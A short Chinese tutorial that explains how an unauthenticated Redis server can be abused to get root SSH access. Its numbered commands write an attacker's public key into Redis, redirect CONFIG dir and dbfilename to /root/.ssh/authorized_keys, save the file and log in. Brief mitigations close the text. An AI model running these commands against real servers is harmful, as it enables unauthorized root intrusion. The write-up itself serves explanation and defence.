这根据redis持久化可生成文件,而且redis可以指定生成文件的位置和名称的bug下,恰巧你的redis里面只有一个key而且是一个ssh公钥,而且你指定持久化文件名“authorized_keys”生成位置是“/root/.ssh/”,这样那个拥有私钥的人就可以无密钥登录root了
1.生成密钥
[root@saltstack-node2~]# (echo -e "\n\n";cat .ssh/id_rsa.pub;echo "\n\n") >/tmp/foo.txt [root@saltstack-node2~]# cat /tmp/foo.txt ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA0rfmYdQvgw/fmrKMj2nRV5FMucTAlv+J49Yu2MRsC9v0ORkesquGShvM/KuIM0P4yMS/l5/N/AzC3X76QJm3XeckuZdpo7KhZGuWGb76n4LrDf1UekagYW7dmW9f2WXnRrxnhl64N3DOeH9A2mD/mRrNrrJ+yyVUjbG9fM+FzOU8mYf7rqvLzqO2ppHYpPj9T5sR8E4bZpYBCQT9JXlA1N3y48LUGUqE5AuUKYEc6wyJCvPxaPWa8Ss03+zaVyF7ly+dje+3sDF1n8DvwveLaXV8BPfGB5bVG4kEtIhiWmWR+ITnLyzLzle2292+BtgfOrKOopk8TlBIhjVzl1LOJQ== root@xxx.example.com \n\n
2.清空redis
清空redis:
127.0.0.1:6379> FLUSHALL OK
3.写一个key
[root@saltstack-node2~]# cat /tmp/foo.txt |redis-cli -x set pwn OK
4.对已知redis进行修改配置
127.0.0.1:6379> CONFIG set dir /root/.ssh OK 127.0.0.1:6379>config set dbfilename "authorized_keys" OK 127.0.0.1:6379> save OK 127.0.0.1:6379> exit
5.可以登录了
[root@saltstack-node2~]# ssh 192.168.81.129 The authenticity of host '192.168.81.129 (192.168.81.129)' can't be established. RSA key fingerprint is 7d:c4:f0:37:1e:ba:da:90:56:8b:fa:ee:df:d0:3f:22. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.81.129' (RSA) to the list of known hosts. Last login: Wed Nov 11 03:18:23 2015 from 192.168.81.1 [root@saltstack-node2~]#
预防措施:
1.不以root或者其它可登录用户启动(用低级权限启动)
2.修改配置增加密码认证
requirepass password
3.绑定内网IP不对外访问
bind 192.168.0.5
4.去除redis里面可进行系统入侵的命令
rename command FLUSHALL "" rename command FLUSHDB "" rename command CONFIG rename command EVAL
